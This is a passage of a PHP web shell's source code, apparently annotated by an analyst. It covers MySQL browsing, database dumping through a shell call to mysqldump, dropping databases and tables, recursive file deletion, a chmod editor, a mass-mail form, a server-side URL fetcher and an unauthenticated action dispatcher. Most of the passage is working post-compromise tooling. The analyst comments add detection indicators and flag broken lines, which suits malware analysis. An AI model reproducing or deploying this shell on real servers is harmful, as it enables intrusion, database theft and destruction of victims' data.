  528. rm_dir_pwn($px.$item_pwn.DIRECTORY_SEPARATOR);
  529. @rmdir($px.$item_pwn);
  530. }
  531. }
  532. }
  533. @closedir($h);
  534. @rmdir($px);
  535. return !is_dir($px);
  536. }
  /**
   * Deletes a path: directories go through rm_dir_pwn(), regular files through unlink().
   *
   * NOTE(review): as pasted, the first argument of str_replace() is "\" - a backslash
   * followed by the closing quote - which does not terminate the string literal, so this
   * copy would not parse. Presumably the original read "\\" and one backslash was lost
   * in decoding or pasting; TODO confirm against another copy before drawing conclusions
   * about how the sample behaved on a host.
   *
   * @param string $o Path to remove.
   * @return bool|null Result of the delete; no value is returned when $o is neither a
   *                   file nor a directory and was not a directory before normalisation.
   */
  537. function rm_items_pwn($o)
  538. {
  // Remember whether the un-normalised path was a directory; used in the fallback branch.
  539. $is_dir_x = is_dir($o);
  540. $o = str_replace("\",DIRECTORY_SEPARATOR,$o);
  541. if (is_dir($o))
  542. {
  543. if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  544. return rm_dir_pwn($o);
  545. }
  546. elseif (is_file($o))
  547. {
  548. return @unlink($o);
  549. }
  550. else
  551. {
  552. if ($is_dir_x)
  553. {
  // $sa_dir is sampled before the delete attempt, so the result reflects the prior state.
  554. $sa_dir=is_dir($o);
  555. rm_dir_pwn($o);
  556. if (!$sa_dir)
  557. {
  558. return TRUE;
  559. }
  560. else
  561. {
  562. return FALSE;
  563. }
  564. }
  565. }
  566. }
  /**
   * Prints the MySQL connection form (host, user, password) plus a hidden id=log_mysql.
   *
   * NOTE(review): the form uses method="GET" and a plain text input for the password,
   * so the submitted database credentials end up in the request URL - and therefore in
   * access logs, proxy logs and browser history. After an incident, any credentials
   * found in hostm/userm/passm parameters should be treated as exposed and rotated.
   */
  567. function login_form_mysql()
  568. {
  569. global $lenguaje;
  570. echo '<div align="center">
  571.      <form method="GET" action="">
  572.      <table width="236" border="0" cellspacing="0" cellpadding="0" align="center">
  573.      <tr>
  574.      <td width="92">Host:</td>
  575.      <td width="144" align="right"><input type="text" name="hostm" id="mysql_host" value="localhost"></td>
  576.      </tr>
  577.      <tr>
  578.      <td>'.$lenguaje[19].'</td>
  579.      <td align="right"><input type="text" name="userm" id="mysql_user"></td>
  580.      </tr>
  581.      <tr>
  582.      <td>'.$lenguaje[20].'</td>
  583.      <td align="right"><input type="text" name="passm" id="mysql_password">
  584.      <input type="hidden" name="id" value="log_mysql"></td>
  585.      </tr>
  586.      </table>
  587.      <br />
  588.      <input type="submit" value="'.$lenguaje[21].'">
  589.      <br />
  590.      </form>
  591.      </div>';
  592. }
  /**
   * Opens a persistent MySQL connection and stores the handle in the global $conexion.
   *
   * Uses mysql_pconnect() from the legacy mysql extension, which was removed in PHP 7.0,
   * so the database features of this sample only run on older PHP builds that still
   * load that extension. Connection errors are @-suppressed.
   *
   * @param string $host MySQL host.
   * @param string $user MySQL user.
   * @param string $pass MySQL password.
   * @return bool TRUE when a connection handle was obtained.
   */
  593. function post_form_mysql($host,$user,$pass)
  594. {
  595. global $conexion;
  596. $conexion=@mysql_pconnect($host,$user,$pass);
  597. if ($conexion)
  598. {
  599. return true;
  600. }
  601. else
  602. {
  603. return false;
  604. }
  605. }
  /**
   * Prints a table of the databases visible to the connection in $conexion, each with
   * links to list its tables (id=list_tb), drop it (id=drop_db) and dump it (id=dump3r).
   *
   * NOTE(review): every link re-embeds the userm/passm/hostm query parameters, so the
   * database credentials are repeated in each subsequent request URL. Values are run
   * through htmlentities()/htmlspecialchars() but are not URL-encoded.
   */
  606. function listar_dbs()
  607. {
  608. global $conexion,$dir,$lenguaje;
  609. echo '<div align="center"><br /> <a href="?id=mysql_login&d='.$dir.'">'.$lenguaje[25].'</a><br/><br/>
  610.      <table cellspacing=1 cellpadding=2>';
  611. $mysql_list_db = @mysql_list_dbs($conexion);
  612. $num = @mysql_num_rows($mysql_list_db);
  613. for($i=0;$i<$num;$i++)
  614. {
  615. $dbname = @mysql_dbname($mysql_list_db,$i);
  616. echo '<tr>
  617.          <td>'.htmlspecialchars($dbname).'</td>
  618.          <td><a href="?id=list_tb&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&dbname='.htmlspecialchars($dbname).'">'.$lenguaje[22].'</a></td>
  619.          <td><a href="?id=drop_db&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&dbname='.htmlspecialchars($dbname).'">'.$lenguaje[23].'</a></td>
  620.          <td><a href="?id=dump3r&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&db='.htmlspecialchars($dbname).'">'.$lenguaje[24].'</a></td>
  621.          </tr>';
  622. }
  623. echo '</table></div>';
  624. }
  /**
   * Prints the tables of one database with per-table links: schema (id=ver_schema),
   * data (id=mostrar_datos), drop (id=drop_tb) and dump (id=dump3r).
   *
   * When the table list is empty or cannot be read, $lenguaje[27] and a back link are
   * printed instead. As in listar_dbs(), each link carries userm/passm/hostm in the URL.
   *
   * @param string $db Database name.
   */
  625. function listar_tbs($db)
  626. {
  627. global $conexion,$lenguaje;
  628. $list_tables=@mysql_list_tables($db);
  629. $num=@mysql_num_rows($list_tables);
  630. if ($num)
  631. {
  632. echo '<div align="center">'.htmlspecialchars($db).' -
  633.          <a href="?id=listar_dbs&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'">'.$lenguaje[25].'</a><br/><br/>
  634.          <table cellspacing=1 cellpadding=2>';
  635. for($i=0;$i<$num;$i++)
  636. {
  637. $nombre_tabla=@mysql_tablename($list_tables,$i);
  638. echo '<tr>
  639.                      <td>
  640.                      '.htmlspecialchars($nombre_tabla).'
  641.                      </td>
  642.                      <td>
  643.                      <a href="?id=ver_schema&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&tbname='.htmlspecialchars($nombre_tabla).'&db='.htmlspecialchars($db).'">Schema</a>
  644.                      </td>
  645.                      <td>
  646.                      <a href="?id=mostrar_datos&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&tbname='.htmlspecialchars($nombre_tabla).'&db='.htmlspecialchars($db).'">'.$lenguaje[26].'</a>
  647.                      </td>
  648.                      <td>
  649.                      <a href="?id=drop_tb&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&dbname='.htmlspecialchars($db).'&tbname='.htmlspecialchars($nombre_tabla).'">'.$lenguaje[23].'</a>
  650.                      </td>
  651.                      <td>
  652.                      <a href="?id=dump3r&userm='.htmlentities($_GET['userm']).'&passm='.htmlentities($_GET['passm']).'&hostm='.htmlentities($_GET['hostm']).'&tablename='.htmlspecialchars($nombre_tabla).'&db='.htmlspecialchars($db).'">'.$lenguaje[24].'</a>
  653.                      </td>
  654.                      </tr>';
  655. }
  656. echo '</table></div>';
  657. }
  658. else
  659. {
  660. echo $lenguaje[27].'<br /> <br /> <a href="?id=listar_dbs&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'">'.$lenguaje[25].'</a>';
  661. }
  662. }
  /**
   * Prints the column definitions of a table (Field, Type, Null, Key, Default, Extra)
   * as returned by "SHOW fields FROM <table>".
   *
   * NOTE(review): $nombre_tabla is interpolated into the SQL text and echoed into the
   * page without quoting or escaping, and the six field values are echoed raw as well.
   * Query errors are @-suppressed, so a failed query simply yields an empty table.
   *
   * @param string $nombre_tabla Table name.
   * @param string $dbname       Database name passed to mysql_db_query().
   */
  663. function ver_schema($nombre_tabla,$dbname)
  664. {
  665. global $conexion,$lenguaje;
  666. $query_show_fields = @mysql_db_query($dbname,"SHOW fields FROM $nombre_tabla");
  667. $num = @mysql_num_rows($query_show_fields);
  668. echo '<div align="center">';
  669. echo $nombre_tabla.' -  <a href="?id=list_tb&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'&dbname='.htmlspecialchars($dbname).'">'.$lenguaje[25].'</a> <br/><br/>
  670.      <table cellspacing=1 cellpadding=2 border=1>
  671.      <tr>
  672.      <td>'.$lenguaje[29].'</td>
  673.      <td>'.$lenguaje[30].'</td>
  674.      <td>'.$lenguaje[31].'</td>
  675.      <td>'.$lenguaje[32].'</td>
  676.      <td>'.$lenguaje[33].'</td>
  677.      <td>'.$lenguaje[34].'</td>
  678.      </tr>';
  679. for( $i = 0;$i <$num;$i++)
  680. {
  681. $field=@mysql_fetch_array($query_show_fields);
  682. echo '<tr>
  683.           <td>&nbsp;'.$field['Field'].'</td>
  684.           <td>&nbsp;'.$field['Type'].'</td>
  685.           <td>&nbsp;'.$field['Null'].'</td>
  686.           <td>&nbsp;'.$field['Key'].'</td>
  687.           <td>&nbsp;'.$field['Default'].'</td>
  688.           <td>&nbsp;'.$field['Extra'].'</td>
  689.           </tr>';
  690. }
  691. echo '</table>';
  692. echo '</div>';
  693. }
  /**
   * Prints page links for browsing a table 30 rows at a time (id=mostrar_datos, with
   * the row offset in the `pag` parameter).
   *
   * The row count comes from running "SELECT * FROM <table>" and counting the result,
   * so the whole table is read just to build the links. $table is interpolated into the
   * SQL unquoted. $paginas is only created inside the loop, so for an empty table
   * implode() receives an undefined variable and the 'Err0r' text is shown.
   *
   * @param string $table Table name.
   * @param string $db    Database to select first.
   */
  694. function paginar($table,$db)
  695. {
  696. global $conexion;
  697. @mysql_select_db($db);
  698. $sergio=@mysql_query("SELECT * FROM $table");
  // Not rounded: the loop below runs while $pag is below this fractional page count.
  699. $total_paginas=mysql_num_rows($sergio) / 30;
  700. for ($pag=0;$pag <$total_paginas;$pag++)
  701. {
  702. $paginas[]='<a href="?id=mostrar_datos&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'&tbname='.htmlspecialchars($_GET['tbname']).'&db='.htmlspecialchars($_GET['db']).'&pag='.($pag * 30).'">'.$pag.'</a>';
  703. }
  704. echo '<table width="400" border="1" cellpadding="0" cellspacing="0">
  705.     <tr>
  706.     <td align="center">';
  707. echo '<font style="font-size:9px; font-family: Verdana">';
  708. $paginas_z=implode(' ',$paginas);
  709. if ($paginas_z)
  710. {
  711. echo $paginas_z;
  712. }
  713. else
  714. {
  715. echo 'Err0r';
  716. }
  717. echo '</font></td>
  718.       </tr>
  719.     </table>';
  720. }
  /**
   * Prints the rows of a table as HTML: a header row from SHOW COLUMNS, then each data
   * row with cell values passed through htmlspecialchars().
   *
   * The query is "SELECT * FROM <table>", with "LIMIT <start>,<count>" appended unless
   * the global $total_paginas equals '1'. Table name and both limit values are
   * interpolated into the SQL unquoted. If the first fetch returns nothing,
   * $lenguaje[35] is printed instead.
   *
   * NOTE(review): mysql_free_Sonuç() is not a function of the mysql extension;
   * presumably this was mysql_free_result() before a blanket "result" -> "Sonuç"
   * text replacement. As pasted, that call would stop the request at this point -
   * TODO confirm against another copy of the sample.
   *
   * @param string $tablename    Table to read.
   * @param string $db           Database to select first.
   * @param mixed  $inicio_limit LIMIT offset.
   * @param mixed  $fin_limit    LIMIT row count.
   */
  721. function mostrar_datos($tablename,$db,$inicio_limit,$fin_limit)
  722. {
  723. global $conexion,$total_paginas,$lenguaje;
  724. @mysql_select_db($db);
  725. if ($total_paginas=='1')
  726. {
  727. $query_pwn="SELECT * FROM $tablename";
  728. }
  729. else
  730. {
  731. $query_pwn="SELECT * FROM $tablename LIMIT $inicio_limit,$fin_limit";
  732. }
  733. $query_columnas=@mysql_query("SHOW COLUMNS FROM $tablename");
  734. $query_datos=@mysql_query($query_pwn);
  // Probe fetch: only used to decide whether the table has any rows.
  735. $control_datos=@mysql_fetch_row($query_datos);
  736. if ($control_datos)
  737. {
  // The query is run a second time so the row consumed by the probe is not lost.
  738. @mysql_free_Sonuç($query_datos);
  739. $query_datos=@mysql_query($query_pwn);
  740. echo '<div align="center">';
  741. echo '<table cellspacing=1 cellpadding=1 border=1>';
  742. echo '<tr>';
  743. while ($columna=@mysql_fetch_row($query_columnas))
  744. {
  // Column names are echoed without escaping, unlike the cell values below.
  745. echo '<td>'.$columna[0].'</td>';
  746. $columnas_matriz[]=$columna[0];
  747. flush();
  748. ob_flush();
  749. }
  750. echo '</tr>';
  751. while ($datos=@mysql_fetch_row($query_datos))
  752. {
  753. echo '<tr>';
  754. for($i=0;$i <count($columnas_matriz);$i++)
  755. {
  756. echo '<td>&nbsp;'.htmlspecialchars($datos[$i]).'</td>';
  757. }
  758. flush();
  759. ob_flush();
  760. echo '</tr>';
  761. }
  762. echo '</table>';
  763. echo '</div>';
  764. }
  765. else
  766. {
  767. echo $lenguaje[35];
  768. }
  769. }
  /**
   * Streams a mysqldump of a database (or one table) to the client as a download.
   *
   * It sets download headers, reads the server's `basedir` variable to locate
   * <basedir>bin/mysqldump, prints a banner line and then runs mysqldump through
   * passthru() so its output goes straight into the response.
   *
   * NOTE(review), for analysis and detection:
   *  - The banner is base64 for "-- Dump3d by Pirulin.PHP Websh3ll v1.0 c0ded by r0dr1 :L".
   *    It is written as the first line of every dump this code produces, so it is a
   *    reliable string to search for in exfiltrated .sql files and proxy captures, and
   *    it suggests this code was lifted from an older tool of that name.
   *  - Host, user, password, database and table are interpolated into the command line
   *    without any escaping, and the password is passed as a command-line argument,
   *    where it is visible in the process list and in process-creation audit logs.
   *  - $bindir is only assigned when a `basedir` row is found; otherwise it is undefined
   *    and the bare name "mysqldump" is used.
   *  - On the host, the observable is the web server / PHP worker spawning mysqldump.
   *
   * @param string $user      MySQL user.
   * @param string $password  MySQL password.
   * @param string $host      MySQL host.
   * @param string $db        Database to dump.
   * @param string $tablename Optional single table; also used as the download file name.
   */
  770. function dump3r($user,$password,$host,$db,$tablename='')
  771. {
  772. if (!$tablename == '')
  773. {
  774. $filename = $tablename;
  775. }
  776. else
  777. {
  778. $filename = $db;
  779. }
  780. header("Content-disposition: filename=$filename.sql");
  781. header('Content-type: application/octetstream');
  782. header('Pragma: no-cache');
  783. header('Expires: 0');
  // Uses the default connection; no link identifier is passed here.
  784. $query_dump = mysql_query('show variables');
  785. while(1)
  786. {
  787. $array_r0w = mysql_fetch_row($query_dump);
  788. if ($array_r0w == false) break;
  789. if ($array_r0w[0] == 'basedir')
  790. $bindir = $array_r0w[1].'bin/';
  791. }
  792. echo base64_decode('LS0gRHVtcDNkIGJ5IFBpcnVsaW4uUEhQIFdlYnNoM2xsIHYxLjAgYzBkZWQgYnkgcjBkcjEgOkw=');
  793. echo '
  794.      ';
  795. passthru($bindir."mysqldump --host=$host --user=$user --password=$password $db $tablename");
  796. }
  /**
   * Drops a database after a one-click confirmation.
   *
   * Without POST field `ok` it prints a confirmation form; with it, it runs
   * "DROP DATABASE <name>" on $conexion and then re-lists the databases.
   *
   * NOTE(review): both the success and the failure branch print $lenguaje[36] (the
   * "deleted successfully" text), so the page output cannot be used to tell whether the
   * drop actually happened - check the database server's own logs instead. $dbname is
   * interpolated into the statement unquoted.
   *
   * @param string $dbname Database to drop.
   */
  797. function drop_db($dbname)
  798. {
  799. global $conexion,$lenguaje;
  800. if (isset($_POST['ok']))
  801. {
  802. if (mysql_query("DROP DATABASE $dbname",$conexion))
  803. {
  804. echo '<b>'.$lenguaje[36].'</b><br /><br />';
  805. listar_dbs();
  806. }
  807. else
  808. {
  809. echo '<b>'.$lenguaje[36].'</b><br /><br />';
  810. listar_dbs();
  811. }
  812. }
  813. else
  814. {
  815. echo '<form method="post" action="">'.$lenguaje[38].' '.htmlspecialchars($dbname).' ?
  816.          <br />
  817.          <br />
  818.          <input type="hidden" name="ok" value="1">
  819.          <input type="submit" value="'.$lenguaje[39].'">
  820.          </form>';
  821. }
  822. }
  /**
   * Drops a table over the global $conexion link after a one-click confirmation form.
   *
   * Analyst notes:
   * - $tbname is concatenated into DROP TABLE without quoting or escaping.
   * - mysql_select_db() runs with errors suppressed and its result is ignored, so the drop
   *   is attempted against whatever database is currently selected on the link.
   * - After the attempt the table list is refreshed from $_GET['dbname'], not from $dbname.
   *
   * @param string $tbname table name taken from the request
   * @param string $dbname database to select before the drop
   */
  823. function drop_tb($tbname,$dbname)
  824. {
  825. global $conexion,$lenguaje;
  826. if (isset($_POST['ok']))
  827. {
  828. @mysql_select_db($dbname);
  829. if (mysql_query("DROP TABLE $tbname",$conexion))
  830. {
  831. echo '<b>'.$lenguaje[40].'</b><br /> <br />';
  832. listar_tbs($_GET['dbname']);
  833. }
  834. else
  835. {
  836. echo '<b>'.$lenguaje[41].'</b><br /> <br />';
  837. listar_tbs($_GET['dbname']);
  838. }
  839. }
  840. else
  841. {
  842. echo '<form method="post" action="">'.$lenguaje[42].' '.htmlspecialchars($tbname).' ?
  843.          <br />
  844.          <br />
  845.          <input type="hidden" name="ok" value="1">
  846.          <input type="submit" value="'.$lenguaje[39].'">
  847.          </form>';
  848. }
  849. }
  /**
   * Prints the HTML form of the bulk-mail tool; it sends nothing itself.
   *
   * The form posts back to the same URL with the fields 'email', 'titulo', 'nombre',
   * 'contenido' and 'maillist'. Those field names appearing together in a POST body are a
   * usable indicator when request bodies are logged (for example by a WAF).
   */
  850. function form_mailer()
  851. {
  852. global $lenguaje;
  853. echo '<form method="post" action="">
  854.      <table width="655" border="0" cellspacing="0" cellpadding="0">
  855.      <tr>
  856.      <td width="115"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[43].': </font></td>
  857.      <td width="10">&nbsp;</td>
  858.      <td width="317"><input name="email" type="text" id="email" size="40"></td>
  859.      <td width="19" rowspan="4">&nbsp;</td>
  860.      <td width="197"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[44].':</font></td>
  861.      </tr>
  862.      <tr>
  863.      <td><p><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[45].'</font>
  864.      <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">:</font></p></td>
  865.      <td height="22">&nbsp;</td>
  866.      <td><input name="titulo" type="text" id="titulo" size="50"></td>
  867.      <td rowspan="3"><textarea name="maillist" cols="30" rows="12" id="maillist"></textarea></td>
  868.      </tr>
  869.      <tr>
  870.      <td><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[3].':</font></td>
  871.      <td>&nbsp;</td>
  872.      <td><input name="nombre" type="text" id="nombre" size="40"></td>
  873.      </tr>
  874.      <tr>
  875.      <td><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">'.$lenguaje[46].': </font></td>
  876.      <td valign="top">&nbsp;</td>
  877.      <td><textarea name="contenido" cols="50" rows="9" id="contenido"></textarea></td>
  878.      </tr>
  879.      </table>
  880.      <div align="center">
  881.      <input type="submit" value="'.$lenguaje[17].'">
  882.      </div>
  883.      </form>';
  884. }
  /**
   * Link lister: fetches a URL server-side and prints the href of every <a> element found.
   *
   * Analyst notes:
   * - The target comes from GET 'url' (plain) or GET 'b64_url' (base64); exactly one of the
   *   two must be present for a fetch to happen.
   * - The fetch is made by the compromised host itself through file_get_contents(), so the
   *   request originates from the server's address. Egress or proxy logs are where to look.
   * - Access-log indicator: requests carrying id=crawl3r together with url= or b64_url=.
   * - $matches_href is never assigned in this function, so the duplicate filter in the
   *   condition below cannot match.
   */
  885. function crawl3r()
  886. {
  887. global $lenguaje;
  888. echo '<form method="GET" action="">
  889.             <input type="hidden" name="id" value="crawl3r">
  890.             <table width="395" border="0" cellspacing="0" cellpadding="0">
  891.             <tr>
  892.             <td width="95">Link:</td>
  893.             <td width="300"><input type="text" name="url" size="50"></td>
  894.             </tr>
  895.             <tr>
  896.             <td colspan="2" align="center"><br><input type="submit" value="OK"></td>
  897.             </tr>
  898.             </table>
  899.             </form><br />';
  // Proceed only when exactly one of 'url' / 'b64_url' is supplied.
  900. if (((isset($_GET['url'])) and (!isset($_GET['b64_url']))) or (((!isset($_GET['url'])) and (isset($_GET['b64_url'])))))
  901. {
  902. if (isset($_GET['url']))
  903. {
  // Server-side fetch of a request-supplied location; errors are suppressed.
  904. $str = @file_get_contents($_GET['url']);
  905. $url = $_GET['url'];
  906. echo htmlentities(utf8_decode($url));
  907. }
  908. else
  909. {
  910. $str = @file_get_contents(base64_decode($_GET['b64_url']));
  911. $url = base64_decode($_GET['b64_url']);
  912. echo htmlentities(utf8_decode($url));
  913. }
  914. echo '<br /><br />';
  915. if ($str)
  916. {
  // Parse the fetched markup; parser warnings are suppressed.
  917. $doc = new DOMDocument();
  918. @$doc->loadHTML($str);
  919. $hrefs = $doc->getElementsByTagName('a');
  920. if ($hrefs)
  921. {
  922. echo '<table border="1" cellspacing="0" cellpadding="0">';
  923. $i=0;
  924. foreach($hrefs as $href)
  925. {
  926. $oki=$href->getAttribute('href');
  // Skips empty hrefs, "/", fragment links and javascript: links.
  927. if ((trim($oki) != '') &&!(@in_array($oki,$matches_href)) &&(trim($oki)!='/') &&(trim($oki[0])!='#') &&(substr(trim($oki),0,10)!='javascript'))
  928. {
  // Only hrefs starting with 'h' get a follow-up link back into the tool.
  929. if ($oki[0] != 'h')
  930. {
  931. echo '<tr>
  932.                             <td>'.$i.'</td>
  933.                             <td width="50">-----</td>
  934.                             <td>';
  935. }
  936. else
  937. {
  938. echo '<tr>
  939.                             <td>'.$i.'</td>
  940.                             <td width="50"><a href="?id=crawl3r&b64_url='.base64_encode($oki).'">Scan it!</a></td>
  941.                             <td>';
  942. }
  943. if ($oki)
  944. {
  945. echo htmlspecialchars(utf8_decode($oki));
  946. }
  947. else
  948. {
  949. echo '&nbsp;';
  950. }
  951. echo '</td>
  952.                             </tr>';
  953. $i++;
  954. }
  955. }
  956. echo '</table>';
  957. }
  958. }
  959. else
  960. {
  // Fetch failed or returned an empty body.
  961. echo $lenguaje[96].' <br /><br /><br />';
  962. }
  963. }
  964. }
  /**
   * Two-step bulk delete driven by checkboxes in the file listing.
   *
   * Step 1 (no *_confirmados fields posted): prints the resolved path of every selected
   * directory and file inside a pre-checked confirmation form.
   * Step 2 (confirmation posted): passes every confirmed path to rm_items_pwn(), which is
   * defined elsewhere in the file, and prints a per-item result line.
   *
   * Analyst notes:
   * - The paths deleted in step 2 come straight from the POST body; they are resolved with
   *   realpath() but not restricted to any base directory.
   * - The resolved paths in step 1 are written into the HTML without escaping.
   * - Indicator: POST bodies containing directorios_confirmados[] or archivos_confirmados[].
   *
   * @param string $dir_pwn     base directory the selected names are relative to
   * @param array  $directorios selected directory names
   * @param array  $archivos    selected file names
   */
  965. function borrrar_checkbox($dir_pwn,$directorios,$archivos)
  966. {
  967. global $lenguaje;
  968. if (isset($_POST['directorios_confirmados']) or isset($_POST['archivos_confirmados']))
  969. {
  970. $directorios_confirmados=$_POST['directorios_confirmados'];
  971. $archivos_confirmados=$_POST['archivos_confirmados'];
  // Confirmed directories.
  972. for ($i = 0;$i <count($directorios_confirmados);$i++)
  973. {
  974. $rm_dir=rm_items_pwn(realpath($directorios_confirmados[$i].'/'));
  975. if($rm_dir)
  976. {
  977. echo '<b><font color="green">'.$lenguaje[68].'! -> '.htmlentities(stripslashes($directorios_confirmados[$i])).'</font></b><br /><br />';
  978. }
  979. else
  980. {
  981. echo '<b><font color="red">Err0r !!!  -> '.htmlentities(stripslashes($directorios_confirmados[$i])).'</font></b><br /<br />';
  982. }
  983. }
  // Confirmed files.
  984. for ($i = 0;$i <count($archivos_confirmados);$i++)
  985. {
  986. $rm_items=rm_items_pwn(realpath($archivos_confirmados[$i]));
  987. if($rm_items)
  988. {
  989. echo '<b><font color="green">'.$lenguaje[69].'! -> '.htmlentities(stripslashes($archivos_confirmados[$i])).'</font></b><br /><br />';
  990. }
  991. else
  992. {
  993. echo '<b><font color="red">Err0r !!!  -> '.htmlentities(stripslashes($archivos_confirmados[$i])).'</font></b><br /<br />';
  994. }
  995. }
  996. echo '<form action="" method="GET">
  997.         <input type="submit" value="'.$lenguaje[57].'"></form>';
  998. }
  999. else
  1000. {
  // Confirmation form: nothing is deleted in this branch.
  1001. echo '<br />'.$lenguaje[86].'<br />';
  1002. echo '<form action="" method="post">
  1003.         <input type="hidden" name="menu_dirs" value="borrar">
  1004.         <table height="20" border="1" cellpadding="0" cellspacing="0">';
  1005. for ($i = 0;$i <count($directorios);$i++)
  1006. {
  1007. $dir_ok=realpath($dir_pwn.'/'.$directorios[$i]);
  1008. echo '<tr>
  1009.             <td>'.$dir_ok.'</td>
  1010.             <td width="20"><input type="checkbox" name="directorios_confirmados[]" value="'.$dir_ok.'" checked>
  1011.             </td>
  1012.             </tr>';
  1013. }
  1014. for ($i = 0;$i <count($archivos);$i++)
  1015. {
  1016. $archivo_ok=realpath($dir_pwn.'/'.$archivos[$i]);
  1017. echo '<tr>
  1018.             <td>'.$archivo_ok.'</td>
  1019.             <td width="20"><input type="checkbox" name="archivos_confirmados[]" value="'.$archivo_ok.'" checked>
  1020.             </td>
  1021.             </tr>';
  1022. }
  1023. echo '</table><br />
  1024.         <input type="submit" value="'.$lenguaje[17].'">
  1025.         </form>';
  1026. }
  1027. }
  /**
   * Reverse-IP lookup: resolves a posted host name and lists other sites a third-party
   * service reports for the same address.
   *
   * Analyst notes:
   * - On POST the host resolves 'url' with gethostbyname() and then requests
   *   http://www.ip-adress.com/reverse_ip/<ip> from the compromised server. DNS and egress
   *   logs should show both.
   * - $web and $ip are echoed without escaping; only the scraped site names are escaped.
   * - ereg() is used, which was removed from PHP in version 7.
   */
  1028. function reverse_dns()
  1029. {
  1030. if ($_POST)
  1031. {
  1032. $web = $_POST['url'];
  // Normalise the input: drop the scheme and one trailing slash.
  1033. if (ereg('http://',$web))
  1034. {
  1035. $web=str_replace('http://','',$web);
  1036. }
  1037. if ($web[strlen($web)-1] == '/')
  1038. {
  1039. $web=substr($web,0,-1);
  1040. }
  1041. $ip = gethostbyname($web);
  // Outbound request to the lookup service; the result is scraped with a regex.
  1042. $source = file_get_contents('http://www.ip-adress.com/reverse_ip/'.$ip);
  1043. preg_match_all('|<a href="/whois/(.*?)">Whois</a>|',$source,$sitios);
  1044. echo 'Web: '.$web.' <br />
  1045.               IP : '.$ip.' <br />
  1046.               Total de sitios (Reverse DNS): '.count($sitios[1]).'<br /><br />';
  1047. foreach ($sitios[1] as $site)
  1048. {
  1049. echo '<a href="http://'.htmlentities($site).'">'.htmlentities($site).'</a><br />';
  1050. }
  1051. }
  1052. else
  1053. {
  1054. echo '<form action="" method="POST">
  1055.         <table>
  1056.         <tr>
  1057.         <td>Url (ej: www.google.com.tr): </td>
  1058.         <td><input type="text" name="url"></td>
  1059.         <tr/>
  1060.         </table>
  1061.         <br />
  1062.         <input type="submit" value="Checkear">
  1063.         </form>';
  1064. }
  1065. }
  /**
   * Shows the current permission bits of a path and, on POST, changes them.
   *
   * Analyst notes:
   * - $pwn comes from GET 'pwnd' (see the dispatcher) and is not restricted to any directory.
   * - POST 'nuevos_permisos' only has to pass is_numeric(); it is handed to chmod() as is,
   *   so it is interpreted as a decimal integer and not as the octal mode the form suggests.
   *   The resulting mode can differ from what was typed (decimal 755 is octal 1363), so
   *   unexpected mode bits on files in a web root are worth a second look.
   * - realpath($pwn) is echoed without escaping.
   *
   * @param string $pwn path whose mode is displayed or changed
   */
  1066. function pwn_chmod($pwn)
  1067. {
  1068. global $lenguaje;
  // Last four octal digits of the current mode; not numeric when fileperms() fails.
  1069. $old=substr(sprintf('%o',@fileperms($pwn)),-4);
  1070. if (is_numeric($old))
  1071. {
  1072. if (isset($_POST['nuevos_permisos']))
  1073. {
  1074. if (is_numeric($_POST['nuevos_permisos']))
  1075. {
  1076. if (@chmod($pwn,$_POST['nuevos_permisos']))
  1077. {
  1078. echo $lenguaje[90];
  1079. }
  1080. else
  1081. {
  1082. echo $lenguaje[91];
  1083. }
  1084. }
  1085. else
  1086. {
  1087. echo $lenguaje[92];
  1088. }
  1089. echo '<br /><br />';
  1090. }
  1091. else
  1092. {
  1093. echo realpath($pwn).'<br /><br /><form method="post" action="">
  1094.             '.$lenguaje[93].':
  1095.             <input type="text" id="old" disabled id="old" readonly="readonly" value="'.$old.'">
  1096.             <br /><br />'.$lenguaje[94].':
  1097.             <input type="text" name="nuevos_permisos" id="nuevos_permisos">
  1098.             <br /><br />
  1099.             <input type="submit" value="editar">
  1100.             </form><br />';
  1101. }
  1102. }
  1103. else
  1104. {
  1105. echo $lenguaje[89].'<br /><br />';
  1106. }
  1107. }
  // Request routing starts here: the action is chosen by the GET parameter 'id' and
  // defaults to the file browser ('dir'). No authentication or session check is visible
  // in this part of the file before an action is dispatched (an earlier part may add one).
  // For log review, the 'id' query parameter is the main pivot for reconstructing what an
  // operator did.
  1108. if (isset($_GET['id']))
  1109. {
  1110. $id_menu=$_GET['id'];
  1111. }
  1112. else
  1113. {
  1114. $id_menu='dir';
  1115. }
  // 'icono' serves an icon through mostrar_iconos() (defined elsewhere) and stops.
  1116. if ($id_menu == 'icono')
  1117. {
  1118. mostrar_iconos($_GET['tipo']);
  1119. exit();
  1120. }
  // Page header and tool menu, printed for every action except phpinfo, proxy, fdown and
  // dump3r (the last two are handled later in the file as raw downloads).
  // Analyst notes:
  // - $dir is only assigned when the request carries a 'd' parameter.
  // - id=reverse makes the compromised host request a third-party lookup page for the
  //   request-supplied 'site' value, then echoes scraped and request values unescaped.
  // - The status table fingerprints the host: cURL, database extensions, perl (through the
  //   command helper c0d3_ex3c(), defined elsewhere) and the disable_functions setting.
